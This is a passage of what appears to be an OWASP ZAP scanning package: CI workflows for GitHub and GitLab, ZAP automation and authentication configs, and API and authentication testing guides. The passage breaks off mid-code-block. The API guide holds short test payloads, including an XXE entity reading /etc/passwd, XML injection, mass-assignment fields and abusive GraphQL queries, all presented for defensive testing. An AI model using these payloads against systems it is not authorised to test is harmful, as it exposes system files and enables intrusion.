workflow_dispatch: # Allow manual triggering
permissions:
contents: read
security-events: write # For uploading SARIF reports
issues: write # For creating security issues
jobs:
zap-baseline-scan:
name: ZAP Baseline Scan (PR/Push)
runs-on: ubuntu-latest
if: github.event_name == 'pull_request' || github.event_name == 'push'
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Run ZAP Baseline Scan
uses: zaproxy/action-baseline@v0.10.0
with:
target: ${{ secrets.STAGING_URL }}
rules_file_name: '.zap/rules.tsv'
cmd_options: '-a -j'
fail_action: true
allow_issue_writing: false
- name: Upload ZAP Scan Report
uses: actions/upload-artifact@v4
if: always()
with:
name: zap-baseline-report
path: |
report_html.html
report_json.json
retention-days: 30
- name: Create Issue on Failure
if: failure()
uses: actions/github-script@v7
with:
script: |
github.rest.issues.create({
owner: context.repo.owner,
repo: context.repo.repo,
title: '🔒 ZAP Baseline Scan Found Security Issues',
body: 'ZAP baseline scan detected security vulnerabilities. Please review the scan report in the workflow artifacts.',
labels: ['security', 'automated']
})
zap-full-scan:
name: ZAP Full Active Scan (Staging)
runs-on: ubuntu-latest
if: github.ref == 'refs/heads/develop' || github.event_name == 'schedule'
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Run ZAP Full Scan
uses: zaproxy/action-full-scan@v0.8.0
with:
target: ${{ secrets.STAGING_URL }}
rules_file_name: '.zap/rules.tsv'
cmd_options: '-a -j -x report.xml'
fail_action: true
allow_issue_writing: true
issue_title: 'ZAP Full Scan: Security Vulnerabilities Detected'
- name: Upload ZAP Full Scan Report
uses: actions/upload-artifact@v4
if: always()
with:
name: zap-full-scan-report
path: |
report_html.html
report_json.json
report.xml
retention-days: 90
- name: Upload SARIF Report to GitHub Security
uses: github/codeql-action/upload-sarif@v3
if: always()
with:
sarif_file: report.xml
zap-api-scan:
name: ZAP API Scan
runs-on: ubuntu-latest
if: github.event_name == 'push' || github.event_name == 'pull_request'
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Run ZAP API Scan
uses: zaproxy/action-api-scan@v0.6.0
with:
target: ${{ secrets.API_URL }}
format: openapi
api_spec_file: './openapi.yaml'
cmd_options: '-a -j'
fail_action: true
- name: Upload API Scan Report
uses: actions/upload-artifact@v4
if: always()
with:
name: zap-api-scan-report
path: |
report_html.html
report_json.json
retention-days: 30
zap-authenticated-scan:
name: ZAP Authenticated Scan
runs-on: ubuntu-latest
if: github.ref == 'refs/heads/develop'
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Setup Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Run Authenticated Scan
env:
APP_PASSWORD: ${{ secrets.TEST_USER_PASSWORD }}
TARGET_URL: ${{ secrets.STAGING_URL }}
run: |
python3 scripts/zap_auth_scanner.py \
--target $TARGET_URL \
--auth-type form \
--login-url $TARGET_URL/login \
--username testuser \
--password-env APP_PASSWORD \
--output ./authenticated-scan-report.html
- name: Upload Authenticated Scan Report
uses: actions/upload-artifact@v4
if: always()
with:
name: zap-authenticated-scan-report
path: authenticated-scan-report.*
retention-days: 90
security-gate:
name: Security Gate Check
runs-on: ubuntu-latest
needs: [zap-baseline-scan]
if: always()
steps:
- name: Download Scan Results
uses: actions/download-artifact@v4
with:
name: zap-baseline-report
- name: Check Security Thresholds
run: |
# Install jq for JSON parsing
sudo apt-get update && sudo apt-get install -y jq
# Count high and medium findings
HIGH_COUNT=$(jq '[.site[].alerts[] | select(.risk == "High")] | length' report_json.json)
MEDIUM_COUNT=$(jq '[.site[].alerts[] | select(.risk == "Medium")] | length' report_json.json)
echo "High risk findings: $HIGH_COUNT"
echo "Medium risk findings: $MEDIUM_COUNT"
# Fail if thresholds exceeded
if [ "$HIGH_COUNT" -gt 0 ]; then
echo "❌ Security gate failed: $HIGH_COUNT high-risk vulnerabilities found"
exit 1
fi
if [ "$MEDIUM_COUNT" -gt 10 ]; then
echo "❌ Security gate failed: $MEDIUM_COUNT medium-risk vulnerabilities (max: 10)"
exit 1
fi
echo "✅ Security gate passed"
- name: Post Summary
if: always()
run: |
echo "## Security Scan Summary" >> $GITHUB_STEP_SUMMARY
echo "" >> $GITHUB_STEP_SUMMARY
echo "| Risk Level | Count |" >> $GITHUB_STEP_SUMMARY
echo "|------------|-------|" >> $GITHUB_STEP_SUMMARY
jq -r '.site[].alerts[] | .risk' report_json.json | sort | uniq -c | \
awk '{print "| " $2 " | " $1 " |"}' >> $GITHUB_STEP_SUMMARY

View File

@@ -0,0 +1,226 @@
# GitLab CI/CD Pipeline for OWASP ZAP Security Scanning
# Add this to your .gitlab-ci.yml file
stages:
- security
- report
variables:
ZAP_IMAGE: "zaproxy/zap-stable:latest"
STAGING_URL: "https://staging.example.com"
REPORTS_DIR: "security-reports"
# Baseline scan for all merge requests
zap_baseline_scan:
stage: security
image: docker:latest
services:
- docker:dind
script:
- mkdir -p $REPORTS_DIR
- |
docker run --rm \
-v $(pwd)/$REPORTS_DIR:/zap/wrk/:rw \
$ZAP_IMAGE \
zap-baseline.py \
-t $STAGING_URL \
-r /zap/wrk/baseline-report.html \
-J /zap/wrk/baseline-report.json \
-w /zap/wrk/baseline-report.md \
|| true
- echo "Baseline scan completed"
artifacts:
when: always
paths:
- $REPORTS_DIR/
reports:
junit: $REPORTS_DIR/baseline-report.xml
expire_in: 1 week
only:
- merge_requests
- develop
- main
tags:
- docker
# Full active scan (manual trigger for staging)
zap_full_scan:
stage: security
image: docker:latest
services:
- docker:dind
script:
- mkdir -p $REPORTS_DIR
- |
docker run --rm \
-v $(pwd)/$REPORTS_DIR:/zap/wrk/:rw \
-v $(pwd)/.zap:/zap/config/:ro \
$ZAP_IMAGE \
zap-full-scan.py \
-t $STAGING_URL \
-c /zap/config/rules.tsv \
-r /zap/wrk/full-scan-report.html \
-J /zap/wrk/full-scan-report.json \
-x /zap/wrk/full-scan-report.xml \
|| true
# Check for high-risk findings
- |
if command -v jq &> /dev/null; then
HIGH_COUNT=$(jq '[.site[].alerts[] | select(.risk == "High")] | length' $REPORTS_DIR/full-scan-report.json)
echo "High risk findings: $HIGH_COUNT"
if [ "$HIGH_COUNT" -gt 0 ]; then
echo "❌ Security scan failed: $HIGH_COUNT high-risk vulnerabilities"
exit 1
fi
fi
artifacts:
when: always
paths:
- $REPORTS_DIR/
expire_in: 4 weeks
only:
- develop
when: manual
allow_failure: false
tags:
- docker
# API security scan
zap_api_scan:
stage: security
image: docker:latest
services:
- docker:dind
script:
- mkdir -p $REPORTS_DIR
- |
if [ -f "openapi.yaml" ]; then
docker run --rm \
-v $(pwd)/$REPORTS_DIR:/zap/wrk/:rw \
-v $(pwd):/zap/specs/:ro \
$ZAP_IMAGE \
zap-api-scan.py \
-t $STAGING_URL \
-f openapi \
-d /zap/specs/openapi.yaml \
-r /zap/wrk/api-scan-report.html \
-J /zap/wrk/api-scan-report.json \
|| true
else
echo "OpenAPI specification not found, skipping API scan"
fi
artifacts:
when: always
paths:
- $REPORTS_DIR/
expire_in: 1 week
only:
- merge_requests
- develop
allow_failure: true
tags:
- docker
# Authenticated scan (requires test credentials)
zap_authenticated_scan:
stage: security
image: python:3.11-slim
before_script:
- apt-get update && apt-get install -y docker.io
script:
- mkdir -p $REPORTS_DIR
- |
python3 scripts/zap_auth_scanner.py \
--target $STAGING_URL \
--auth-type form \
--login-url $STAGING_URL/login \
--username $TEST_USERNAME \
--password-env TEST_PASSWORD \
--output $REPORTS_DIR/authenticated-scan-report.html
artifacts:
when: always
paths:
- $REPORTS_DIR/
expire_in: 4 weeks
only:
- develop
when: manual
tags:
- docker
# Security gate - check thresholds
security_gate:
stage: report
image: alpine:latest
before_script:
- apk add --no-cache jq
script:
- |
if [ -f "$REPORTS_DIR/baseline-report.json" ]; then
HIGH_COUNT=$(jq '[.site[].alerts[] | select(.risk == "High")] | length' $REPORTS_DIR/baseline-report.json)
MEDIUM_COUNT=$(jq '[.site[].alerts[] | select(.risk == "Medium")] | length' $REPORTS_DIR/baseline-report.json)
echo "==================================="
echo "Security Scan Results"
echo "==================================="
echo "High risk findings: $HIGH_COUNT"
echo "Medium risk findings: $MEDIUM_COUNT"
echo "==================================="
# Fail on high-risk findings
if [ "$HIGH_COUNT" -gt 0 ]; then
echo "❌ Build failed: High-risk vulnerabilities detected"
exit 1
fi
# Warn on medium-risk findings above threshold
if [ "$MEDIUM_COUNT" -gt 10 ]; then
echo "⚠️ Warning: $MEDIUM_COUNT medium-risk findings (threshold: 10)"
fi
echo "✅ Security gate passed"
else
echo "No scan report found, skipping security gate"
fi
dependencies:
- zap_baseline_scan
only:
- merge_requests
- develop
- main
# Generate consolidated report
generate_report:
stage: report
image: alpine:latest
before_script:
- apk add --no-cache jq curl
script:
- |
echo "# Security Scan Report" > $REPORTS_DIR/summary.md
echo "" >> $REPORTS_DIR/summary.md
echo "**Scan Date:** $(date)" >> $REPORTS_DIR/summary.md
echo "**Target:** $STAGING_URL" >> $REPORTS_DIR/summary.md
echo "" >> $REPORTS_DIR/summary.md
echo "## Findings Summary" >> $REPORTS_DIR/summary.md
echo "" >> $REPORTS_DIR/summary.md
if [ -f "$REPORTS_DIR/baseline-report.json" ]; then
echo "| Risk Level | Count |" >> $REPORTS_DIR/summary.md
echo "|------------|-------|" >> $REPORTS_DIR/summary.md
jq -r '.site[].alerts[] | .risk' $REPORTS_DIR/baseline-report.json | \
sort | uniq -c | awk '{print "| " $2 " | " $1 " |"}' >> $REPORTS_DIR/summary.md
fi
cat $REPORTS_DIR/summary.md
artifacts:
when: always
paths:
- $REPORTS_DIR/summary.md
expire_in: 4 weeks
dependencies:
- zap_baseline_scan
only:
- merge_requests
- develop
- main

View File

@@ -0,0 +1,196 @@
# OWASP ZAP Automation Framework Configuration
# Complete automation workflow for web application security testing
env:
contexts:
- name: WebApp-Security-Scan
urls:
- ${TARGET_URL}
includePaths:
- ${TARGET_URL}.*
excludePaths:
- .*logout.*
- .*signout.*
- .*\\.css
- .*\\.js
- .*\\.png
- .*\\.jpg
- .*\\.gif
- .*\\.svg
authentication:
method: form
parameters:
loginUrl: ${LOGIN_URL}
loginRequestData: username={%username%}&password={%password%}
verification:
method: response
loggedInRegex: "\\QWelcome\\E"
loggedOutRegex: "\\QLogin\\E"
sessionManagement:
method: cookie
parameters:
sessionCookieName: JSESSIONID
users:
- name: test-user
credentials:
username: ${TEST_USERNAME}
password: ${TEST_PASSWORD}
parameters:
failOnError: true
failOnWarning: false
progressToStdout: true
vars:
target_url: ${TARGET_URL}
api_key: ${ZAP_API_KEY}
jobs:
# Environment setup
- type: environment
parameters:
deleteGlobalAlerts: true
updateAddOns: true
# Import OpenAPI specification (if available)
- type: openapi
parameters:
apiFile: ${OPENAPI_SPEC_FILE}
apiUrl: ${TARGET_URL}
targetUrl: ${TARGET_URL}
context: WebApp-Security-Scan
optional: true
# Spider crawling
- type: spider
parameters:
context: WebApp-Security-Scan
user: test-user
maxDuration: 10
maxDepth: 5
maxChildren: 10
acceptCookies: true
handleODataParametersVisited: true
parseComments: true
parseRobotsTxt: true
parseSitemapXml: true
parseSVNEntries: true
parseGit: true
postForm: true
processForm: true
requestWaitTime: 200
# AJAX Spider for JavaScript-heavy applications
- type: spiderAjax
parameters:
context: WebApp-Security-Scan
user: test-user
maxDuration: 10
maxCrawlDepth: 5
numberOfBrowsers: 2
browserId: firefox-headless
clickDefaultElems: true
clickElemsOnce: true
eventWait: 1000
reloadWait: 1000
optional: true
# Wait for passive scanning to complete
- type: passiveScan-wait
parameters:
maxDuration: 5
# Configure passive scan rules
- type: passiveScan-config
parameters:
maxAlertsPerRule: 10
scanOnlyInScope: true
enableTags: true
disableRules:
- 10096 # Timestamp Disclosure (informational)
# Active scanning
- type: activeScan
parameters:
context: WebApp-Security-Scan
user: test-user
policy: Default Policy
maxRuleDurationInMins: 5
maxScanDurationInMins: 30
addQueryParam: false
defaultPolicy: Default Policy
delayInMs: 0
handleAntiCSRFTokens: true
injectPluginIdInHeader: false
scanHeadersAllRequests: false
threadPerHost: 2
# Wait for active scanning to complete
- type: activeScan-wait
# Generate reports
- type: report
parameters:
template: traditional-html
reportDir: ${REPORT_DIR}
reportFile: security-report.html
reportTitle: Web Application Security Assessment
reportDescription: Automated DAST scan using OWASP ZAP
displayReport: false
- type: report
parameters:
template: traditional-json
reportDir: ${REPORT_DIR}
reportFile: security-report.json
reportTitle: Web Application Security Assessment
- type: report
parameters:
template: traditional-xml
reportDir: ${REPORT_DIR}
reportFile: security-report.xml
reportTitle: Web Application Security Assessment
- type: report
parameters:
template: sarif-json
reportDir: ${REPORT_DIR}
reportFile: security-report.sarif
reportTitle: Web Application Security Assessment (SARIF)
optional: true
# Alert filters (false positive suppression)
alertFilters:
- ruleId: 10021
newRisk: Info
url: ".*\\.css|.*\\.js|.*cdn\\..*"
context: WebApp-Security-Scan
- ruleId: 10096
newRisk: Info
url: ".*api\\..*"
parameter: "created_at|updated_at|timestamp"
context: WebApp-Security-Scan
# Scan policies
policies:
- name: Default Policy
defaultStrength: Medium
defaultThreshold: Medium
rules:
- id: 40018 # SQL Injection
strength: High
threshold: Low
- id: 40012 # Cross-Site Scripting (Reflected)
strength: High
threshold: Low
- id: 40014 # Cross-Site Scripting (Persistent)
strength: High
threshold: Low
- id: 90019 # Server-Side Code Injection
strength: High
threshold: Low
- id: 90020 # Remote OS Command Injection
strength: High
threshold: Low

View File

@@ -0,0 +1,192 @@
<?xml version="1.0" encoding="UTF-8"?>
<!--
OWASP ZAP Authentication Context Template
Configure this file for form-based, HTTP, or script-based authentication
-->
<configuration>
<context>
<!-- Context Name -->
<name>WebApp-Auth-Context</name>
<desc>Authentication context for web application security testing</desc>
<!-- Enable context -->
<inscope>true</inscope>
<!-- URL Scope Definition -->
<!-- Include all URLs under target domain -->
<incregexes>https://app\.example\.com/.*</incregexes>
<!-- Exclude logout and static content -->
<excregexes>https://app\.example\.com/logout</excregexes>
<excregexes>https://app\.example\.com/signout</excregexes>
<excregexes>https://app\.example\.com/static/.*</excregexes>
<excregexes>.*\.css</excregexes>
<excregexes>.*\.js</excregexes>
<excregexes>.*\.png|.*\.jpg|.*\.gif</excregexes>
<!-- Technology Detection -->
<tech>
<include>Language</include>
<include>Language.JavaScript</include>
<include>OS</include>
<include>OS.Linux</include>
<include>WS</include>
</tech>
<!-- Authentication Configuration -->
<authentication>
<!--
Authentication Types:
- formBasedAuthentication: Traditional login forms
- httpAuthentication: HTTP Basic/Digest/NTLM
- scriptBasedAuthentication: Custom authentication via script
-->
<type>formBasedAuthentication</type>
<!-- Form-Based Authentication -->
<form>
<!-- Login URL -->
<loginurl>https://app.example.com/login</loginurl>
<!-- Login Request Body (POST parameters) -->
<!-- Use {%username%} and {%password%} as placeholders -->
<loginbody>username={%username%}&amp;password={%password%}&amp;csrf_token={%csrf_token%}</loginbody>
<!-- Login Page URL (where login form is displayed) -->
<loginpageurl>https://app.example.com/login</loginpageurl>
</form>
<!-- HTTP Authentication (uncomment if using) -->
<!--
<http>
<realm>Protected Area</realm>
<hostname>app.example.com</hostname>
<port>443</port>
</http>
-->
<!-- Logged-In Indicator (regex pattern that appears when logged in) -->
<!-- This helps ZAP determine if authentication succeeded -->
<loggedin>\QWelcome,\E</loggedin>
<!-- Alternative patterns:
<loggedin>\QLogout\E</loggedin>
<loggedin>\Qdashboard\E</loggedin>
<loggedin>class="user-menu"</loggedin>
-->
<!-- Logged-Out Indicator (regex pattern that appears when logged out) -->
<loggedout>\QYou are not logged in\E</loggedout>
<!-- Alternative patterns:
<loggedout>\QLogin\E</loggedout>
<loggedout>\QSign In\E</loggedout>
-->
<!-- Poll URL for verification (optional) -->
<pollurl>https://app.example.com/api/session/verify</pollurl>
<polldata></polldata>
<pollfreq>60</pollfreq>
</authentication>
<!-- Session Management -->
<sessionManagement>
<!--
Session Management Types:
- cookieBasedSessionManagement: Session via cookies (most common)
- httpAuthSessionManagement: HTTP authentication
- scriptBasedSessionManagement: Custom session handling
-->
<type>cookieBasedSessionManagement</type>
<!-- Session cookies to monitor -->
<sessioncookies>
<cookie>JSESSIONID</cookie>
<cookie>PHPSESSID</cookie>
<cookie>sessionid</cookie>
<cookie>session_token</cookie>
</sessioncookies>
</sessionManagement>
<!-- Test Users -->
<users>
<!-- User 1: Standard test user -->
<user>
<name>testuser</name>
<enabled>true</enabled>
<credentials>
<credential>
<name>username</name>
<value>testuser</value>
</credential>
<credential>
<name>password</name>
<value>TestPassword123!</value>
</credential>
<!-- CSRF token (if needed) -->
<!--
<credential>
<name>csrf_token</name>
<value></value>
</credential>
-->
</credentials>
</user>
<!-- User 2: Admin user (if testing authorization) -->
<user>
<name>adminuser</name>
<enabled>false</enabled>
<credentials>
<credential>
<name>username</name>
<value>adminuser</value>
</credential>
<credential>
<name>password</name>
<value>AdminPassword123!</value>
</credential>
</credentials>
</user>
</users>
<!-- Forced User Mode (for authorization testing) -->
<!--
Enables testing if authenticated user can access resources
they shouldn't have access to
-->
<forcedUserMode>false</forcedUserMode>
<!-- Data Driven Nodes -->
<!--
For testing parameters with different values
-->
<datadrivennodes>
<node>
<name>user_id</name>
<url>https://app.example.com/api/users/{user_id}</url>
</node>
</datadrivennodes>
</context>
<!-- Global Exclude URLs (applied to all contexts) -->
<globalexcludeurl>
<regex>https://.*\.googleapis\.com/.*</regex>
<regex>https://.*\.google-analytics\.com/.*</regex>
<regex>https://.*\.googletagmanager\.com/.*</regex>
<regex>https://cdn\..*</regex>
</globalexcludeurl>
<!-- Anti-CSRF Token Configuration -->
<anticsrf>
<!-- Enable anti-CSRF token handling -->
<enabled>true</enabled>
<!-- Token names to automatically detect and handle -->
<tokennames>
<tokenname>csrf_token</tokenname>
<tokenname>csrftoken</tokenname>
<tokenname>_csrf</tokenname>
<tokenname>authenticity_token</tokenname>
<tokenname>__RequestVerificationToken</tokenname>
</tokennames>
</anticsrf>
</configuration>

View File

@@ -0,0 +1,40 @@
# Reference Document Template
This file contains detailed reference material that Claude should load only when needed.
## Table of Contents
- [Section 1](#section-1)
- [Section 2](#section-2)
- [Security Standards](#security-standards)
## Section 1
Detailed information, schemas, or examples that are too large for SKILL.md.
## Section 2
Additional reference material.
## Security Standards
### OWASP Top 10
Reference relevant OWASP categories:
- A01: Broken Access Control
- A02: Cryptographic Failures
- etc.
### CWE Mappings
Map to relevant Common Weakness Enumeration categories:
- CWE-79: Cross-site Scripting
- CWE-89: SQL Injection
- etc.
### MITRE ATT&CK
Reference relevant tactics and techniques if applicable:
- TA0001: Initial Access
- T1190: Exploit Public-Facing Application
- etc.

View File

@@ -0,0 +1,475 @@
# ZAP API Security Testing Guide
Advanced guide for testing REST, GraphQL, SOAP, and WebSocket APIs using OWASP ZAP.
## Overview
Modern applications rely heavily on APIs. This guide covers comprehensive API security testing patterns using ZAP's API scanning capabilities.
## API Types Supported
- **REST APIs** (JSON, XML)
- **GraphQL APIs**
- **SOAP APIs** (WSDL-based)
- **gRPC APIs**
- **WebSocket APIs**
## REST API Testing
### Testing with OpenAPI/Swagger Specification
**Best Practice:** Always use API specifications when available for complete coverage.
```bash
# Basic OpenAPI scan
docker run -v $(pwd):/zap/wrk/:rw -t zaproxy/zap-stable zap-api-scan.py \
-t https://api.example.com \
-f openapi \
-d /zap/wrk/openapi.yaml \
-r /zap/wrk/api-report.html
```
### Testing Without Specification (Spider-Based)
When no specification is available:
```bash
# Use standard spider with API context
docker run -v $(pwd):/zap/wrk/:rw -t zaproxy/zap-stable zap-full-scan.py \
-t https://api.example.com \
-r /zap/wrk/api-report.html \
-z "-config spider.parseComments=true -config spider.parseRobotsTxt=true"
```
### Authentication Patterns
#### Bearer Token (JWT)
```bash
# Obtain token first
TOKEN=$(curl -X POST https://api.example.com/auth/login \
-H "Content-Type: application/json" \
-d '{"username":"testuser","password":"password"}' \
| jq -r '.access_token')
# Scan with authentication
python3 scripts/zap_api_scan.py \
--target https://api.example.com \
--format openapi \
--spec openapi.yaml \
--header "Authorization: Bearer $TOKEN"
```
#### API Key Authentication
```bash
# API key in header
python3 scripts/zap_api_scan.py \
--target https://api.example.com \
--format openapi \
--spec openapi.yaml \
--header "X-API-Key: your-api-key-here"
# API key in query parameter
python3 scripts/zap_api_scan.py \
--target https://api.example.com?api_key=your-api-key \
--format openapi \
--spec openapi.yaml
```
### Common REST API Vulnerabilities
#### 1. Broken Object Level Authorization (BOLA)
**Detection:** Test access to resources belonging to other users.
**Manual Test:**
```bash
# Request resource with different user IDs
curl -H "Authorization: Bearer $USER1_TOKEN" \
https://api.example.com/users/123/profile
curl -H "Authorization: Bearer $USER2_TOKEN" \
https://api.example.com/users/123/profile # Should be denied
```
**ZAP Configuration:**
Add authorization test scripts to detect BOLA.
#### 2. Mass Assignment
**Detection:** Send additional fields not in API specification.
**Test Payload:**
```json
{
"username": "testuser",
"email": "test@example.com",
"is_admin": true, # Unauthorized field
"role": "admin" # Unauthorized field
}
```
#### 3. Rate Limiting
**Detection:** Send multiple requests rapidly.
```bash
# Test rate limiting
for i in {1..100}; do
curl https://api.example.com/endpoint -H "Authorization: Bearer $TOKEN"
done
```
**Expected:** HTTP 429 (Too Many Requests) after threshold.
## GraphQL API Testing
### Testing with GraphQL Schema
```bash
# Scan GraphQL endpoint with schema
docker run -v $(pwd):/zap/wrk/:rw -t zaproxy/zap-stable zap-api-scan.py \
-t https://api.example.com/graphql \
-f graphql \
-d /zap/wrk/schema.graphql \
-r /zap/wrk/graphql-report.html
```
### GraphQL Introspection
**Check if introspection is enabled:**
```bash
curl -X POST https://api.example.com/graphql \
-H "Content-Type: application/json" \
-d '{"query": "{ __schema { types { name } } }"}'
```
**Security Note:** Disable introspection in production.
### GraphQL-Specific Vulnerabilities
#### 1. Query Depth/Complexity Attacks
**Malicious Query:**
```graphql
query {
user {
posts {
comments {
author {
posts {
comments {
author {
# ... deeply nested
}
}
}
}
}
}
}
}
```
**Mitigation:** Implement query depth/complexity limits.
#### 2. Batch Query Attacks
**Malicious Query:**
```graphql
query {
user1: user(id: 1) { name email }
user2: user(id: 2) { name email }
# ... repeated hundreds of times
user500: user(id: 500) { name email }
}
```
**Mitigation:** Limit batch query size.
#### 3. Field Suggestions
When introspection is disabled, test field suggestions:
```graphql
query {
user {
nam # Intentional typo to trigger suggestions
}
}
```
## SOAP API Testing
### Testing with WSDL
```bash
# SOAP API scan with WSDL
docker run -v $(pwd):/zap/wrk/:rw -t zaproxy/zap-stable zap-api-scan.py \
-t https://api.example.com/soap \
-f soap \
-d /zap/wrk/service.wsdl \
-r /zap/wrk/soap-report.html
```
### SOAP-Specific Vulnerabilities
#### 1. XML External Entity (XXE)
**Test Payload:**
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<soap:Envelope>
<soap:Body>
<login>
<username>&xxe;</username>
</login>
</soap:Body>
</soap:Envelope>
```
#### 2. XML Injection
**Test Payload:**
```xml
<username>admin</username><role>admin</role></user><user><username>attacker</username>
```
## WebSocket Testing
### Manual WebSocket Testing
ZAP can intercept WebSocket traffic:
1. Configure browser proxy to ZAP
2. Connect to WebSocket endpoint
3. Review messages in ZAP's WebSocket tab
4. Manually craft malicious messages
### Common WebSocket Vulnerabilities
- **Message Injection:** Inject malicious payloads in WebSocket messages
- **Authentication Bypass:** Test if authentication is required for WebSocket connections
- **Message Tampering:** Modify messages in transit
## API Security Testing Checklist
### Authentication & Authorization
- [ ] Test unauthenticated access to protected endpoints
- [ ] Test authorization bypass (access other users' data)
- [ ] Test JWT token validation (expiration, signature)
- [ ] Test API key validation
- [ ] Test role-based access control (RBAC)
### Input Validation
- [ ] Test SQL injection in parameters
- [ ] Test NoSQL injection (MongoDB, etc.)
- [ ] Test command injection
- [ ] Test XML injection (for SOAP APIs)
- [ ] Test mass assignment vulnerabilities
- [ ] Test parameter pollution
### Rate Limiting & DoS
- [ ] Verify rate limiting is enforced
- [ ] Test resource exhaustion (large payloads)
- [ ] Test query complexity limits (GraphQL)
- [ ] Test batch request limits
### Data Exposure
- [ ] Check for sensitive data in responses
- [ ] Test verbose error messages
- [ ] Verify PII is properly protected
- [ ] Check for data leakage in logs
### Transport Security
- [ ] Verify HTTPS is enforced
- [ ] Test TLS configuration (strong ciphers only)
- [ ] Check certificate validation
- [ ] Verify HSTS header is set
### Business Logic
- [ ] Test state manipulation
- [ ] Test payment flow manipulation
- [ ] Test workflow bypass
- [ ] Test negative values/amounts
## ZAP Automation for API Testing
### Automation Framework Configuration
`api_automation.yaml`:
```yaml
env:
contexts:
- name: API-Context
urls:
- https://api.example.com
includePaths:
- https://api.example.com/.*
authentication:
method: header
parameters:
header: Authorization
value: "Bearer ${API_TOKEN}"
jobs:
- type: openapi
parameters:
apiFile: /zap/wrk/openapi.yaml
apiUrl: https://api.example.com
targetUrl: https://api.example.com
context: API-Context
- type: passiveScan-wait
- type: activeScan
parameters:
context: API-Context
policy: API-Scan-Policy
user: api-user
- type: report
parameters:
template: traditional-html
reportDir: /zap/wrk/
reportFile: api-security-report.html
reportTitle: API Security Assessment
```
Run:
```bash
export API_TOKEN="your-token-here"
docker run -v $(pwd):/zap/wrk/:rw -t zaproxy/zap-stable \
zap.sh -cmd -autorun /zap/wrk/api_automation.yaml
```
## Custom API Scan Policies
### Create API-Optimized Scan Policy
Disable irrelevant checks for APIs:
- Disable DOM XSS checks (no browser context)
- Disable CSRF checks (stateless APIs)
- Enable injection checks (SQL, NoSQL, Command)
- Enable authentication/authorization checks
See `assets/scan_policy_api.policy` for pre-configured policy.
## API Testing Tools Integration
### Postman Integration
Export Postman collection to OpenAPI:
```bash
# Use Postman's built-in export or newman
newman run collection.json --export-collection openapi.yaml
```
### cURL to OpenAPI Conversion
Use tools like `curl-to-openapi` to generate specs from cURL commands.
## Common API Testing Patterns
### Pattern 1: CRUD Operation Testing
Test all CRUD operations for each resource:
```bash
# CREATE
curl -X POST https://api.example.com/users \
-H "Authorization: Bearer $TOKEN" \
-d '{"username":"testuser"}'
# READ
curl https://api.example.com/users/123 \
-H "Authorization: Bearer $TOKEN"
# UPDATE
curl -X PUT https://api.example.com/users/123 \
-H "Authorization: Bearer $TOKEN" \
-d '{"username":"updated"}'
# DELETE
curl -X DELETE https://api.example.com/users/123 \
-H "Authorization: Bearer $TOKEN"
```
### Pattern 2: Multi-User Testing
Test with different user roles:
```bash
# Admin user
export ADMIN_TOKEN="admin-token"
python3 scripts/zap_api_scan.py --target https://api.example.com \
--header "Authorization: Bearer $ADMIN_TOKEN"
# Regular user
export USER_TOKEN="user-token"
python3 scripts/zap_api_scan.py --target https://api.example.com \
--header "Authorization: Bearer $USER_TOKEN"
```
### Pattern 3: Versioned API Testing
Test all API versions:
```bash
# v1
python3 scripts/zap_api_scan.py --target https://api.example.com/v1 \
--spec openapi-v1.yaml
# v2
python3 scripts/zap_api_scan.py --target https://api.example.com/v2 \
--spec openapi-v2.yaml
```
## Troubleshooting API Scans
### Issue: OpenAPI Import Fails
**Solution:** Validate OpenAPI spec:
```bash
# Use Swagger Editor or openapi-validator
npx @apidevtools/swagger-cli validate openapi.yaml
```
### Issue: Authentication Not Working
**Solution:** Test authentication manually first:
```bash
curl -v https://api.example.com/protected-endpoint \
-H "Authorization: Bearer $TOKEN"
```
### Issue: Rate Limiting During Scan
**Solution:** Reduce scan speed:
```bash
docker run -t zaproxy/zap-stable zap-api-scan.py \
-t https://api.example.com -f openapi -d /zap/wrk/spec.yaml \
-z "-config scanner.delayInMs=1000"
```
## Additional Resources
- [OWASP API Security Top 10](https://owasp.org/www-project-api-security/)
- [REST API Security Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/REST_Security_Cheat_Sheet.html)
- [GraphQL Security](https://graphql.org/learn/authorization/)
- [ZAP OpenAPI Add-on](https://www.zaproxy.org/docs/desktop/addons/openapi-support/)

View File

@@ -0,0 +1,431 @@
# ZAP Authentication Configuration Guide
Comprehensive guide for configuring authenticated scanning in OWASP ZAP for form-based, token-based, and OAuth authentication.
## Overview
Authenticated scanning is critical for testing protected application areas that require login. ZAP supports multiple authentication methods:
- **Form-Based Authentication** - Traditional username/password login forms
- **HTTP Authentication** - Basic, Digest, NTLM authentication
- **Script-Based Authentication** - Custom authentication flows (OAuth, SAML)
- **Token-Based Authentication** - Bearer tokens, API keys, JWT
## Form-Based Authentication
### Configuration Steps
1. **Identify Login Parameters**
- Login URL
- Username field name
- Password field name
- Submit button/action
2. **Create Authentication Context**
```bash
# Use bundled script
python3 scripts/zap_auth_scanner.py \
--target https://app.example.com \
--auth-type form \
--login-url https://app.example.com/login \
--username testuser \
--password-env APP_PASSWORD \
--verification-url https://app.example.com/dashboard \
--output authenticated-scan-report.html
```
3. **Configure Logged-In Indicator**
Specify a regex pattern that appears only when logged in:
- Example: `Welcome, testuser`
- Example: `<a href="/logout">Logout</a>`
- Example: Check for presence of dashboard elements
### Manual Context Configuration
Create `auth-context.xml`:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<context>
<name>WebAppAuth</name>
<desc>Authenticated scanning context</desc>
<inscope>true</inscope>
<incregexes>https://app\.example\.com/.*</incregexes>
<authentication>
<type>formBasedAuthentication</type>
<form>
<loginurl>https://app.example.com/login</loginurl>
<loginbody>username={%username%}&amp;password={%password%}</loginbody>
<loginpageurl>https://app.example.com/login</loginpageurl>
</form>
<loggedin>\QWelcome,\E</loggedin>
<loggedout>\QYou are not logged in\E</loggedout>
</authentication>
<users>
<user>
<name>testuser</name>
<credentials>
<credential>
<name>username</name>
<value>testuser</value>
</credential>
<credential>
<name>password</name>
<value>SecureP@ssw0rd</value>
</credential>
</credentials>
<enabled>true</enabled>
</user>
</users>
<sessionManagement>
<type>cookieBasedSessionManagement</type>
</sessionManagement>
</context>
</configuration>
```
Run scan with context:
```bash
